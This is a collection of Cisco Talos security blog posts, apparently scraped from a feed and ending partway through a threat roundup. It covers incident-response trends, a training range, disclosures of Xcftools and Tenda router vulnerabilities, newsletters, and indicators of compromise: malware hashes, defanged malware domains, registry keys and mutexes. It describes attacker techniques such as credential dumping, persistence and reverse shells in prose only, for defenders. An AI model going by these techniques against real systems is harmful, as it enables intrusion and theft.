Description: Cisco Talos recently discovered multiple vulnerabilities in the LEADTOOLS line of imaging toolkits. LEADTOOLS is a collection of toolkits designed to perform a variety of functions aimed at integrating documents, multimedia and imaging technologies into applications. All of the software is produced by LEAD Technologies Inc. LEADTOOLS offers prebuilt and portable libraries with an SDK for most platforms (Windows, Linux, Android, etc.), that are all geared toward building applications for medical systems. Various pieces of LEADTOOLS contain vulnerabilities that could be exploited by malicious actors to carry out a number of actions, including denial-of-service conditions and the execution of code remotely.
Snort SIDs: 50824 - 50827, 51930-51938, 51447, 51448

Most prevalent malware files this week

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854
MD5: 74f4e22e5be90d152521125eaf4da635
Typical Filename: jsonMerge.exe
Claimed Product: ITSPlatform
Detection Name: W32.GenericKD:Attribute.22lk.1201

SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
Typical Filename: xme32-2141-gcc.exe
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: Eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.WNCryLdrA:Trojan.22k2.1201

How the new Talos IR Cyber Range can prepare your employees for a cyber attack

$
0
0
By Gerard Johansen, Charles Iszard and Luke DuCharme.

With the surge of ransomware attacks, information leaks and other cyber attacks in the headlines, most companies and organizations are aware that their employees need to be trained on how to stay safe online. But the real challenge lies in how to develop these pieces of training and tools in-house to build the necessary muscle memory to prevent and respond to an event.  Sending an analyst or two to a distant location for training depletes travel and training budgets, and when they return, there is little time to transfer this knowledge back to colleagues or managers.

Vendor-provided training focuses on the vendor’s proprietary technology and often neglects the concepts that need to be incorporated into an organization’s ability to respond.

To address these issues, Cisco Talos Incident Response (CTIR) created an interactive Cyber Range focused on Incident Response. This immersive experience is designed and delivered by incident response professionals for security professionals who need to increase their competency and muscle memory in incident response-related tasks.


CTIR Cyber Range is a comprehensive, three-day training exercise that utilizes a crawl-walk-run methodology. Students start by being shown various tools and techniques, then apply them to a real-world scenario. This step-by-step process allows students to build the skills necessary to tackle the next challenge, a guided scenario.

On the final day, the students are tasked with responding to a real-world attack scenario, during which they are required to periodically brief key stakeholders, identify a root cause, and brief their leadership – all while working collaboratively as a team to overcome the various challenges within the scenario.

CTIR Cyber Range includes several key features that were designed to develop the skills necessary to address security incidents. First, CTIR developed a self-contained network infrastructure that is brought onsite to the customer. This allows CTIR to conduct the Cyber Range without the need to connect to external infrastructure, thereby removing latency or outage issues that often arise with those types of methods.

A second key feature is the inclusion of real-world adversary tactics, techniques, or procedures (TTPs) conducted against real targets – the same tactics that CTIR responds to on a daily basis.  Customers have to work through a realistic network with production operating system targets.  The incorporation of current adversary TTPs provides the students with the most realistic experience.  Coupled with a completely isolated infrastructure, students examine realistic malware and exploits in a safe environment without the additional risk of unintentionally infecting their own network.

One area of concern customers often have when working within a commercial cyber range is the reliance on tools that are not included in their technology stack. But CTIR’s Cyber Range is designed to include a mix of open-source tools that provide necessary investigative features while focusing on the methodology and techniques of incident response investigations. This focus on methods and concepts instead of tools provides the students a way to transfer their newly acquired skills to their existing or anticipated tools.

Teamwork is a crucial component in any security operations environment. Likewise, the Cyber Range not only focuses on technical skills but also on those soft skills that are essential during an incident — such as answering calls from the CEO about the incident, delegating tasks, updating other stakeholders, and providing a final briefing. These tasks, along with working through the evidence as a team, build team cohesion and the ability to solve complex incident investigations together.

The final component to the Cyber Range is the immersive student experience. As students work through the various exercises, CTIR instructors are there every step of the way. First, as instructors/mentors, then as the course progresses, to provide guidance where necessary, and answer questions as incident response professionals who execute these techniques on a daily basis. Small class sizes also ensure each student is given the appropriate level of attention and each experience is beneficial leading up to the student capstone exercise at the end of the day.


The CTIR Cyber Range is a unique experience that combines the expertise of incident response professionals, realistic attacks, current TTPs, and teamwork. Through this exercise, organizations can incorporate skills and processes that will aid in the proper response to an incident and reduce its potential impact. For more information on the cyber range, inquire about a CTIR retainer.

Cryptominers, ransomware among top malware in IR engagements in Q4

$
0
0

By David Liebenberg and Kendall McKay.

This summer’s most popular malware families were commonly seen, unsophisticated attacks, with phishing being the top infection vector, according to Cisco Talos Incident Response (CTIR) data. In addition to threat actors repeatedly deploying common threats like ransomware as final payloads, we found that adversaries also leveraged similarly well-known open-source frameworks post-compromise to enable activities such as traversing victim networks, reaching out to command and control (C2) nodes, and exfiltrating data. These findings indicate that organizations across a variety of industry verticals continue to face challenges in defending against common threats and attack methods, most of which have the potential to cause critical damage if not detected and remediated quickly and effectively.

The discoveries outlined in this blog were observed during CTIR engagements between May and July, which corresponds to Cisco’s fourth quarter in fiscal year 2019. These reports, which we intend to publish quarterly, are intended to provide executives and network defenders with regular updates and analysis on the threat landscape.

Top threats

The top threats that we observed between May and July included ransomware, commodity banking malware such as Emotet and Trickbot, and illicit cryptocurrency miners. Although adversaries’ use of ransomware initially appeared to slow down following the rise of cryptocurrency miners, ransomware was by far the most commonly observed threat in incident response engagements during the time period in question. We also frequently saw commodity banking trojans acting as a dropper for ransomware.

Ransomware

Based on our findings, ransomware was the most common threat affecting organizations, with Ryuk being the most frequently deployed type of ransomware. Ryuk infections targeted companies in the retail, media and entertainment, software and internet, and healthcare industries, severely impacting business-critical services and operations. In at least one case, the Ryuk infection occurred months after the initial Trickbot compromise, indicating that the threat actor avoided detection and maintained access to the victim system for a prolonged period of time.

In most of our incident response engagements, we observed multiple threats being deployed on victim systems at various stages of the operation. Ryuk, for example, was typically dropped by banking trojans such as Trickbot, which is consistent with the ransomware’s known TTPs. In one such incident, a company experienced a Trickbot-Ryuk infection, after which the adversary used the open-source framework PowerShell Empire to pull down Sodinokibi ransomware binary code from a Pastebin page.  However, some Ryuk infections were not accompanied by a commodity malware dropper. One such company was infected with Ryuk via a malicious decoy Microsoft Word install, causing Microsoft Exchange servers and domain controllers to lose availability and impacting business operations.

Banking trojans

Modular banking trojans were also observed in several incident response engagements, often as a dropper for ransomware. The most commonly observed variants were Emotet and Trickbot. Other banking trojans observed between May and July included Qakbot, Cridex and Dridex and affected organizations in the retail, business services, media and entertainment, software and internet, manufacturing and health care industries.

As mentioned above, several incident response engagements involved Trickbot dropping Ryuk. During at least one case, in which the adversary used PSExec and RDP to stage, spread, and execute the malware, the infection was widespread and progressed over time. Emotet was also observed in several engagements this past quarter. In one instance, a manufacturing company fell victim to an Emotet infection that was caused by malicious spam sent from one of their regional offices. An employee received a high-quality spoofed email that appeared to come from another employee and contained a malicious attachment, which likely led to an Emotet infection.

The actors behind banking trojans such as Trickbot and Emotet have shown a willingness to continually update their malware, adding new modules for increased lateral movement and data exfiltration. They also have been increasing commodification of their malware, engaging in malware-as-a-service by providing access to their tools and infrastructure to other malicious actors. Given adversaries’ propensity to target enterprise networks, they remain a consistent threat observed by responders.

Coinminers

Between May and July, we observed a number of illicit cryptomining attacks in our telemetry and CTIR engagements, several of which involved prominent Chinese botnets and the collaboration of multiple threat actors. Cryptomining malware was observed in CTIR engagements with organizations in the education, health care, business services, telecommunications, and retail industries. Following a dramatic drop in cryptocurrency values in 2018, the market appears to be slowly rebounding with gradual price increases since in early 2019. Despite the fluctuating market, threat actors have largely remained undeterred from targeting cryptocurrency exchanges, suggesting that the currency’s monetary value has little to do with their decision to carry out these types of attacks. As the value of cryptocurrencies continue to rise, we expect illicit cryptoming attacks to remain constant  and possibly increase in frequency.

Prominent Chinese cryptocurrency botnets were observed in several engagements. A company in the business services industry had an internet-facing server exploited and was infected with malware associated with cybercriminal group Rocke. The threat actor, which Cisco Talos wrote about in 2018, is linked to the Iron cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, and ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In another engagement, a telecommunications company was compromised with a Monero miner associated with another prominent Chinese-language botnet that Talos has been following since February 2019. This actor had been observed exploiting unsecured ElasticSearch clusters to drop cryptocurrency miners, as well as targeting Oracle WebLogic and Hadoop YARN. During the CTIR engagement, the actor conducted a brute-force authentication attack, after which automated adversary scanners attempted to install cryptocurrency mining malware. Several Hadoop virtual machines (VM) became infected with mining malware that reached out to a known C2 used by the group.

Our findings also indicated that mining malware is usually delivered by relatively unsophisticated means such as mass exploitation campaigns or brute-forcing. These types of common infection vectors are often used by various other threat actors to carry out a range of unrelated threat activity, suggesting that the presence of mining malware can sometimes be an indication that more sophisticated malware is also present on the victim’s environment.

Top entry vectors 

We were unable to determine the entry vector during the majority of engagements due to the victim organization having insufficient logging and security instrumentation. However, when the entry vector could be reasonably determined or assumed, phishing, brute-forcing and exploitation of web applications were the most frequent entry methods.

Phishing  

With the prevalence of banking trojans that mostly spread via malspam and phishing campaigns, it should be no surprise that email was one of the top initial vectors we observed. Several engagements saw Emotet and Trickbot delivered via malicious emails. This included emails sent from one victim within an organization to another, which can make detecting a phishing incident much more difficult by both the victim and security appliances.

Brute-force

Brute-force attacks occur when an attacker continuously attempts to log in to an application until they find the correct ID-password combination that grants them access. These processes are typically automated and happen at a rapid pace. In addition to our CTIR team uncovering evidence of brute-force attacks in their engagements, we also frequently observed this type of activity in our Talos honeypot infrastructure.

Web application compromise

Another common initial vector was the exploitation of unpatched internet-facing applications. Threat actors commonly scan for unpatched servers to exploit using publically available proofs-of-concept soon after vulnerabilities are announced. We frequently observed this activity in our telemetry and have seen it in incident response engagements as well. For instance, a business services company had cryptocurrency miners dropped onto their environment after actors exploited vulnerabilities in their Jenkins servers, while an organization in the education industry had their SharePoint servers breached with a web shell.

Actions after compromise

In addition to completing their primary objectives – for example, encrypting files during a ransomware attack – we observed threat actors carrying out a variety of secondary actions post-compromise,  such as reaching out to a C2 for follow-on malware or instructions, traversing the network, compromising user accounts, establishing persistence and exfiltrating data. This type of malicious activity after compromise shows how adversaries can leverage common and relatively unsophisticated tactics, including the use of widely available open-source tools, to carry out successful operations.

Cisco Talos also observed some common lateral movement methods. For instance, we frequently observed exploitation of SMB and internal spam as a means of a lateral movement, typical actions of banking trojans such as Trickbot and Emotet. We also observed attackers in several engagements leveraging readily available open-source post-exploitation tools to traverse the network and execute malware. This includes Mimikatz, a post-exploitation tool that dumps passwords from memory, as well as other sensitive data.

We also observed PowerShell Empire, an open-source post-exploitation framework that leverages PowerShell and includes modules ranging from keyloggers to credential dumpers, to execute malware, traverse the network, and reach out to C2s. Defenders should not underestimate the damage an attacker can cause through the use of these tools. Evidence of Mimikatz in particular potentially indicates that an organization’s critical services may be severely compromised. During an engagement with a manufacturing company, we observed the presence of Mimikatz in a local administrator account’s remote interactive session. We also found compromised accounts from this organization and another CTIR response victim for sale on the dark web.

We also observed common persistence techniques such as establishing a cron job to reach out to the payload hosting domain and execute the payload, installing multiple copies of a payload on a host, creating scheduled tasks, and creating registry keys in the Autorun locations in the registry.

Multiple actors compromising the same victim

An organization vulnerable to compromise may be attacked by multiple adversaries, each with different objectives, and these adversaries may even battle one another for control of the victim network. In one instance, we observed a malicious threat actor named Rocke, another cryptomining actor named Watchbog, as well as the longrunning China.Z botnet on the same victim. In another case, we observed a ransomware event that ran parallel to an adversary who had compromised credentials via Mimikatz. During a ransomware event, a second adversary compromised the victim’s externally facing SSH server to drop IoT botnet malware. It is important to consider the implications of finding multiple actors, mainly how organizations can address the underlying security weaknesses to prevent these attacks as well as improvements in visibility to help increase detection.

This one reason why a common threat, like a ransomware event, banking trojan outbreak, or illicit mining attack can be considered a canary in the coal mine, showing that a low-effort, low-sophistication attack successfully bypassed an organization’s defenses, which could indicate the presence of other actors.

What to watch for and mitigations

The fact that these common threats prevail shows that adversaries are able to take advantage of typical weaknesses in an organization’s security architecture. Since phishing was a top entry vector, Talos urges a multi-pronged approach to address email security, including user training (how to identify and report suspected phishing), technical anti-spoofing controls, intelligence-based email security filtering, and configuring end-points to be less vulnerable to common attacks.

The lack of monitoring for deployed network detection tools/systems was a key weakness as well. This was especially true in some of these incidents where tools like Cisco AMP were deployed in “audit” mode but were not being reviewed by a person or aggregated into SIEM software.

Post-compromise, the lack of logging was a weakness present in almost every engagement. A lack of logging makes it difficult for responders to put together a complete picture of what adversaries achieved post-compromise. This was also one of the reasons why in the majority of engagements we were unable to exactly pinpoint the initial vector of attack.

Other common weaknesses we observed included lack of multi-factor authentication, sensitive servers exposed to the internet or not properly segmented, lack of patching, and ineffective security products.

Beers with Talos Ep. #66: I Choose YOU! Attackers view of targets, RLAs, scam season

$
0
0
By Mitch Neff.

Beers with Talos (BWT) Podcast episode No. 66 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Nov. 8, 2019 

Joel is out on PTO, so Mitch, Matt, Nigel, and Craig carry the banner this episode discussing how attackers approach targets like investors look at portfolios. We also talk about how the most recent off-cycle elections in the US give us a glimpse of improvements and changes in election security. Finally, we take a quick look at popular scams and how attackers use seasonality to increase the relevance of their scams for emotional responses.

The timeline:

  • 01:40 — Roundtable: Minds blown over planetary mechanics and the existence of Instapots.
  • 14:15 —How attackers are looking at targets: defending from different attackers.
  • 23:00 — Election security: A quick look at recent improvements and Mitch’s tin-foil hat.
  • 33:40 — Welcome to scam season! How attackers use emotion to increase effectiveness.
  • 41:40 — Closing thoughts and parting shots.

Some other links:

==========

Featuring: Craig Williams (@Security_Craig), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Vulnerability Spotlight: Two remote code execution vulnerabilities in Xcftools

$
0
0

Claudio Bozzato of Cisco Talos discovered these vulnerabilities. 

Xcftools contains two remote code execution vulnerabilities in its flattenIncrementally function. Xcftools is a set of tools for handling Gimp’s XCF files. The software provides tools to extract information from an XCF file, and then converting XCF files into a PNG or PNM file. An attacker could exploit these bugs by tricking a user into opening a specially crafted XCF file.

Cisco Talos is disclosing these vulnerabilities after xcftools failed to patch them per Cisco’s 90-day deadline. Read more about the Cisco vulnerability disclosure policy here.

Vulnerability details

xcftools flattenIncrementally tiles walk code execution vulnerability (TALOS-2019-0878/CVE-2019-5086)

An exploitable integer overflow vulnerability exists in the flattenIncrementally function in the xcf2png and xcf2pnm binaries of xcftools, version 1.0.7. An integer overflow can occur while walking through tiles that could be exploited to corrupt memory and execute arbitrary code. In order to trigger this vulnerability, a victim would need to open a specially crafted XCF file.

Read the complete vulnerability advisory here for additional information.

xcftools flattenIncrementally rows allocation code execution vulnerability (TALOS-2019-0879/CVE-2019-5087)

An exploitable integer overflow vulnerability exists in the flattenIncrementally function in the xcf2png and xcf2pnm binaries of xcftools 1.0.7. An integer overflow can occur while calculating the row's allocation size, that could be exploited to corrupt memory and eventually execute arbitrary code. In order to trigger this vulnerability, a victim would need to open a specially crafted XCF file.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that xcftools version 1.0.7 is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 43857 - 43860, 50842 - 50845

Vulnerability Spotlight: Tenda AC9 /goform/WanParameterSetting command injection vulnerability

$
0
0

Amit Raut of Cisco Talos discovered this vulnerability.

Cisco Talos recently discovered a command injection vulnerability in the Tenda AC9 router. The Tenda AC9 is one of the most popular and affordable dual-band gigabit WiFi Router available online, especially on Amazon. A command injection vulnerability exists in the
`/goform/WanParameterSetting` resource. A locally authenticated attacker can execute arbitrary commands to post parameters to execute commands on the router. The attacker can get reverse shell running as root using this command injection.

Cisco Talos is disclosing this vulnerability after Tenda failed to patch it per Cisco’s 90-day deadline. Read more about the Cisco vulnerability disclosure policy here.

Vulnerability details

Tenda AC9 /goform/WanParameterSetting command injection vulnerability (TALOS-2019-0861/CVE-2019-5071, CVE-2019-5072)

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send a specific HTTP POST request with a command to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that AC9V1.0, firmware, versions 15.03.05.16_multi_TRU and 15.03.05.14_EN are affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 50782 - 50785


Threat Source newsletter (Nov. 21, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

It’s nearly holiday shopping season, which means it’s prime scam season. On the latest Beers with Talos episode, we run down the best ways to stay safe while shopping online and how to detect phony emails. It’s also election season, which makes for some good discussion.

And, as it’s time to look back on the year that was, we have a new feature from Talos Incident Response where we take a quarter-by-quarter look at the top threats we’ve seen in the wild. In Q4 of Cisco’s fiscal year, our IR analysts mainly saw ransomware and cryptocurrency miners.

IR also had another exciting announcement this week, with the unveiling of a new cyber range that can help train employees to avoid common scams that can lead to malware infection. The cyber range now comes with any IR retainer.

The Threat Source newsletter is getting a week off next week for the Thanksgiving holiday in the U.S., so we’ll talk to you again in December.

Upcoming public engagements with Talos

Event: “Reading Telegram messages abusing the shadows” at BSides Lisbon 
Location: Auditorio FMD-UL, Lisbon, Portugal
Date: Nov. 28 - 29
Speakers: Vitor Ventura
Synopsis: One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications.

Event: “Signed, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks” at CactusCon
Location: Charleston Coliseum & Convention Center, Charleston, WV
Date: Dec. 6 - 7
Speakers: Edmund Brumaghin and Earl Carter
Synopsis: This talk will discuss the common techniques we’re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future.

Cyber Security Week in Review

  • The highly publicized Checkra1n jailbreak for iOS devices has been on the market for a week now. Here’s what that means for iPhone users and security researchers, and why it poses such an ethical dilemma.  
  • Google and Samsung recently patched a vulnerability in some of their smartphones that could allow an attacker to take over the device’s camera. But other Android devices may still be at risk. 
  • Several government services in Louisiana were taken down due to a ransomware attack. Two days post-infection, the state’s motor vehicles department was still closed. But state officials say no one has paid the ransom requested by the attackers. 
  • The Australian government released a proposal to secure internet-of-things devices. It is a voluntary code the country is asking companies to abide to, including devices like "everyday smart devices that connect to the internet, such as smart TVs, watches, and home speakers.” 
  • Numerous popular apps on the Google Play store are still vulnerable to long-known remote code execution vulnerabilities. A study found that while these apps do have recent updates, they don’t necessarily protect against publicly disclosed bugs. 
  • The Russian government is eager to bring an alleged hacker back into its country after he appeared in a U.S. court to face charges. Research indicates the man may be one of the most well-connected hackers in Russia and the government fears he knows too much. 
  • Microsoft says there is “no evidence” that the Dopplepaymer malware is spreading through Microsoft Teams. The company said after extensive research, it believes the only way Dopplemaymer can spread is through remote human operators using existing Domain Admin credentials. 
  • Many user accounts for the newly launched Disney+ streaming service have been stolen and listed for sale on the dark web. However, Disney says there is no evidence to indicate its servers were breached. 

Notable recent security issues

Title: New, custom dropped delivers variety of information-stealing malware 
Description: A wave of adversaries which are dropping well-known information-stealer like Agent Tesla, Loki-bot and others since at least January 2019 using custom droppers. These droppers inject the final malware into common processes on the victim machine. Once infected, the malware can steal information from many popular pieces of software, including the Google Chrome, Safari and Firefox web browsers. The injection techniques are well-known and have been used for many years, but with the adversaries customizing them, traditional anti-virus systems are having a hard time detecting the embedded malware.
Snort SIDs: 52246

Title: Denial-of-service vulnerability in some Intel graphics drivers
Description: Intel’s IGC64.dll graphics driver contains a denial-of-service vulnerability. An attacker could exploit this bug by supplying a malformed pixel shader if the graphics driver is operating inside a VMware guest operating system. This type of attack can be triggered from VMware guest usermode to cause a denial-of-service attack due to an out-of-bounds read in the driver.
Snort SIDs: 50295, 50296

Most prevalent malware files this week

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: Eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.WNCryLdrA:Trojan.22k2.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc 
MD5: c5608e40f6f47ad84e2985804957c342
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Service
Detection Name: PUA:2144FlashPlayer-tpd 

Threat Roundup for November 15 to November 22

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 15 and Nov. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Downloader.Nymaim-7391562-0 Downloader Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Trojan.Bunitu-7394346-0 Trojan Bunitu is malware that establishes a persistent foothold on an infected machine and then turns it into a proxy for criminal VPN services.
Win.Malware.Trickbot-7394707-1 Malware Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Worm.Vobfus-7395002-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server.
Win.Malware.DarkComet-7395004-1 Malware DarkComet and related variants are a family of RATs designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Ransomware.Cerber-7395321-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Dropper.Remcos-7395733-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Tofsee-7402230-0 Dropper Tofsee is multipurpose malware that features several modules used to carry out malicious activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

Threat Breakdown

Win.Downloader.Nymaim-7391562-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 25
<HKCU>\SOFTWARE\MICROSOFT\KPQL 25
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
25
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp
25
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}25
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}25
Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}25
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}25
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}25
Local\{0F53A50D-AEA8-402A-580B-3C32A490301E}25
Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}25
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
sqmgdts[.]net25
wneeuc[.]in25
jiwlzenl[.]com25
zgzaztmi[.]com25
amkqrprvei[.]com25
srbhfbemi[.]pw25
yoekgdnoyej[.]in25
scwafgfxlr[.]net25
grnorxacnw[.]com25
futzruakw[.]pw25
dhcfsfxgb[.]net25
lmgsmlhidh[.]net25
fpmuefeozs[.]in25
wjpbf[.]net25
yfuoixdwjxpy[.]pw25
sqwpuwoq[.]net25
wqjlwcnqbe[.]com25
tjjqmo[.]net25
bsztb[.]in25
gmznk[.]com25
cejwtluei[.]com25
rejfedtcd[.]net25
uktldpj[.]com25
aanpolaayjm[.]net25
rdipde[.]com25
*See JSON for more IOCs
Files and or directories createdOccurrences
%ProgramData%\ph25
%ProgramData%\ph\eqdw.dbc25
%ProgramData%\ph\fktiipx.ftf25
%TEMP%\gocf.ksv25
%TEMP%\kpqlnn.iuy25
%TEMP%\fro.dfx24
%TEMP%\npsosm.pan24
\Documents and Settings\All Users\pxs\dvf.evp24
\Documents and Settings\All Users\pxs\pil.ohu24

File Hashes

009c5d8c565ffc008a15040f7c1ce30a65321089606ad3e6e711e715e65ed5d3 043fd8c728078e4cc3402b65d216e224a482532faaa18dff9ce7baea068666a6 0c6cf23450cb8d2f982780d0b63b32f84c4cef5ed035b336198cfab945d7222f 0e2c7c4988f5d6b83aa46bfaec967e409310588fb31d41aaf752cd0cd1f61e07 159157544afea2dae4868b345f3ace9dbb3946dcdb051afda1f9d3de43b84b5b 27992098e220360f3a5896812a077ba611dce6936c7d8a93a8851b9498534483 2f625f48f37cc6d9ad56bf49690f578d345ca7938750614fce45a6db3ea94ee2 3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4 3dccca8f309ddb9675ef1099afa48c99259af991603ffe82a83ad9516b5742f3 5c3ad5d944eb5911e73ced27779e8ecb6a555c64ace076998018e313c058c128 630b0e5f46a932762b7e569f0785e163db04a5e482a1b2c2469343439cd5f004 689c22dc80615221d5c64720f599a33eaa093e27aabcd89191fa446d5dcc8463 75d8010dab02726e712f1ba1cba34ae48d3aabf897c22caf258a552282c7cfa3 776186df1d180131e8272e9bed1901a10156c3f12adacd904b8023fe5f164b22 8837d607c0bf29f0855967de0cb3ac6e36c6418786e693dbcb92cce0addef532 8ad6d601b0d1e03dda4b01708e40fcbcc66e610c2b848f1662b26d70aa358cf6 8b75cc8eeff51a02702262472039bda60c892e0beba4f76d5b3262f1c1482081 8cb66655a63b931fd20483d5b347756980e2a5f1d70a66fb84819b1a10c82722 9c79e22684603ef09d8939a72827d9e39478e2583740f55d4a5f676a4d1cd30c a02dc770b986b1360c6534907f5c9ad368f7810da498a6df1e2bedd665db75ef a0977a0743fd97773d06407074172e2e763d5306310075b301833454204fecce a2eef697284f59a4306ad79669dcb9c1e095595cbf52a73a6775e90a34c790c4 a94e7042aea0920a02775452ec9f05ab07b7ae60a7c9466a2ce8eb8b5e40b428 aaa24779cd52e2685d6646ac379a1c102b8811f1d969e16c2d6b358d00a147ec ad3f4bd490dd4134e099d505123e528f858463a7e17989c258516c7d24ac3836
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSAThis has coverage

Screenshots of Detection

AMP



Win.Trojan.Bunitu-7394346-0

Indicators of Compromise

Registry KeysOccurrences
